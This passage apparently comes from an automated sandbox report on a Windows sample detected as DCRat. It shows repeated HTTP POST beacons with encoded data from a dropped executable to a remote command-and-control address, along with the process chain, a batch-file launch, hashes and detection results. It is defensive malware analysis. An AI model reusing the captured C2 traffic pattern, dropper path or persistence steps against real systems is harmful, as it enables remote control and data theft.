                                                Dec 5, 2024 16:03:51.706182957 CET | 2560 | OUT | POST body
                                                Dec 5, 2024 16:03:52.676578045 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:52.985109091 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:52 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                68 | 192.168.2.7 | 50004 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:53.233935118 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:53.581221104 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:03:54.595108032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:54.832226992 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:54 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                69 | 192.168.2.7 | 50010 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:55.075115919 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:55.424959898 CET | 2564 | OUT | POST body


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                70 | 192.168.2.7 | 50011 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:56.049314976 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:56.395211935 CET | 1452 | OUT | POST body
                                                Dec 5, 2024 16:03:57.375293970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:57.608352900 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:57 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                71 | 192.168.2.7 | 50012 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:56.169380903 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:56.519203901 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:03:57.500520945 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:57.736330986 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:57 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                72 | 192.168.2.7 | 50018 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:57.984463930 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:58.331367970 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:03:59.305738926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:59.543287992 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:59 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                73 | 192.168.2.7 | 50024 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:59.795341015 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:00.145144939 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:04:01.242125034 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:01.476268053 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:01 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                74 | 192.168.2.7 | 50029 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:04:01.713241100 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:02.069159985 CET | 2564 | OUT | POST body


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                75 | 192.168.2.7 | 50031 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:04:02.751642942 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1424
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:03.096868992 CET | 1424 | OUT | POST body
                                                Dec 5, 2024 16:04:04.076395988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:04.312241077 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                76 | 192.168.2.7 | 50032 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:04:02.871788025 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:03.221817970 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:04:04.191463947 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:04.424211025 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:03 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                77 | 192.168.2.7 | 50038 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:04:04.666766882 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:04:05.018726110 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:04:05.986280918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:06.224277020 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:05 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                78 | 192.168.2.7 | 50043 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:04:06.476505995 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:06.831218958 CET | 2564 | OUT | POST body
                                                Dec 5, 2024 16:04:07.798830986 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:08.032321930 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:07 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                79 | 192.168.2.7 | 50049 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:04:08.275660038 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:04:08.628185987 CET | 2564 | OUT | Data Raw: 55 51 5a 5b 5e 5c 54 59 5e 5e 51 57 50 53 5a 5a 59 53 58 46 5b 5e 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQZ[^\TY^^QWPSZZYSXF[^RQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^+/>3/94()+Y+&(\*_?Z"?4=1[+(8^'1T??!Y""Z)
                                                Dec 5, 2024 16:04:09.626641035 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:04:09.860270023 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:04:09 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Target ID:0
                                                Start time:10:02:03
                                                Start date:05/12/2024
                                                Path:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\A5EbyKyjhV.exe"
                                                Imagebase:0xfc0000
                                                File size:2'551'808 bytes
                                                MD5 hash:48B90C11912E9C7147D86C55D1E2CC94
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:7
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                                                Imagebase:0x7ff79e380000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\chcp.com
                                                Wow64 process (32bit):false
                                                Commandline:chcp 65001
                                                Imagebase:0x7ff70d7e0000
                                                File size:14'848 bytes
                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:10:02:07
                                                Start date:05/12/2024
                                                Path:C:\Windows\System32\PING.EXE
                                                Wow64 process (32bit):false
                                                Commandline:ping -n 10 localhost
                                                Imagebase:0x7ff640910000
                                                File size:22'528 bytes
                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:10:02:16
                                                Start date:05/12/2024
                                                Path:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"
                                                Imagebase:0x460000
                                                File size:2'551'808 bytes
                                                MD5 hash:48B90C11912E9C7147D86C55D1E2CC94
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 74%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:9.4%
                                                  Total number of Nodes:32
                                                  Total number of Limit Nodes:2

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6$r6
                                                  • API String ID: 0-596633268
                                                  • Opcode ID: 93bea826571818d65f5e5a95a31c7e952172dc8ebfdbf04fb31dead49ae9dea8
                                                  • Instruction ID: 4df2e0f7440d3e8f3f406194fdd18ecf2d5b6f7b9a024dec7ad4c75ea594fc8d
                                                  • Opcode Fuzzy Hash: 93bea826571818d65f5e5a95a31c7e952172dc8ebfdbf04fb31dead49ae9dea8
                                                  • Instruction Fuzzy Hash: 3152BF71929649CFEB59CF18E494AB877A2FF49300F5081BDD45FC7286EA38E845CB80

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$d
                                                  • API String ID: 0-2243634771
                                                  • Opcode ID: 86aa5d8b0b0557261d33feaac99a94695a7d9d72f257c4614b06f617ed29c616
                                                  • Instruction ID: 9adef13d546300a875f389f97bb86376498f7ace9bddec01238bb48fa4cb2f22
                                                  • Opcode Fuzzy Hash: 86aa5d8b0b0557261d33feaac99a94695a7d9d72f257c4614b06f617ed29c616
                                                  • Instruction Fuzzy Hash: F3221771A0D7468FE74ADB28D4914F57BE0EF96310B1891BBE04ECB197DE24E80A87C1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  • Opcode ID: bb452a4b13ee5a23a42a6a7498c41f312e515b80862a25c11b6b7e8392cbf972
                                                  • Instruction ID: 6366ea9bdd21cb079017e2a6f55cc9909ae69e6a452fab08d83c0b9c6997ece0
                                                  • Opcode Fuzzy Hash: bb452a4b13ee5a23a42a6a7498c41f312e515b80862a25c11b6b7e8392cbf972
                                                  • Instruction Fuzzy Hash: CB417270908A4C8FEB99EF58D849BEDBBF5FB56310F10416AD04ED7252DA34A849CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 556aa82f8ff9bec6176f8b28343a800987eb34db8942b411e9ce8511e3472a88
                                                  • Instruction ID: 3557ecc17637fe0643124bddd9326516b16f1b0f026ede145fc0be71dca324fd
                                                  • Opcode Fuzzy Hash: 556aa82f8ff9bec6176f8b28343a800987eb34db8942b411e9ce8511e3472a88
                                                  • Instruction Fuzzy Hash: 44523A7090962ECFEB58DF14C494BF977B2FF59304F50856DE00E97292CA38A986CB80

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: c92f3a2fe5f48d7a9435d2c79392b5d0bcdcd4edab03a8b4e7d66de951d0e202
                                                  • Instruction ID: 204b34f6f306c262d3b69406658c8ce46b44c2ffb9b276a7ffc7e3b165bbc424
                                                  • Opcode Fuzzy Hash: c92f3a2fe5f48d7a9435d2c79392b5d0bcdcd4edab03a8b4e7d66de951d0e202
                                                  • Instruction Fuzzy Hash: 5CC1C670619A469FF74ADF28C0916A47BA1FF56310F54A17AD04ECBA86CB38F855CBC0

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: 6a00856ab08d1946b8ac419cb4b99951a125e3f4f6f427f554d8c34960e599f3
                                                  • Instruction ID: fce7aa25fae760927dccc7f7c09fd5e7c67e659428161ab75832d2305f4c7b04
                                                  • Opcode Fuzzy Hash: 6a00856ab08d1946b8ac419cb4b99951a125e3f4f6f427f554d8c34960e599f3
                                                  • Instruction Fuzzy Hash: 93C1C531519A469FF749DB28E0516B4B7A2FF56700F94C17AC04EC7A86EB28F855CBC0

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6
                                                  • API String ID: 0-3183416175
                                                  • Opcode ID: 1daf3fbc2c5e1b202f9bc4308aa0bb36a5a3b2d09b6f5c5b5ac8095330004bbc
                                                  • Instruction ID: 867405952f8dbedb3ffec4e19f349b1b71a82a8a6f6fa728352596fc0bcc5547
                                                  • Opcode Fuzzy Hash: 1daf3fbc2c5e1b202f9bc4308aa0bb36a5a3b2d09b6f5c5b5ac8095330004bbc
                                                  • Instruction Fuzzy Hash: 59510831D2C55ACEFBA89B18E455AF477A2FF55700F90C1B9D04FC7586EE28A84487C1

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: a2f035654b3df88ea0bc0fe8e0c5415a3d17f67dcde5a1af32038bb8d5a4e77c
                                                  • Instruction ID: dab98725baf27e082daab5e3cdd639edf286b1d0590856912c1a35145f09d456
                                                  • Opcode Fuzzy Hash: a2f035654b3df88ea0bc0fe8e0c5415a3d17f67dcde5a1af32038bb8d5a4e77c
                                                  • Instruction Fuzzy Hash: CB22A630A19A19CFEB99DB18C895A6973E1FF95310F5091BAE00EC7292DF24EC45CB84

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
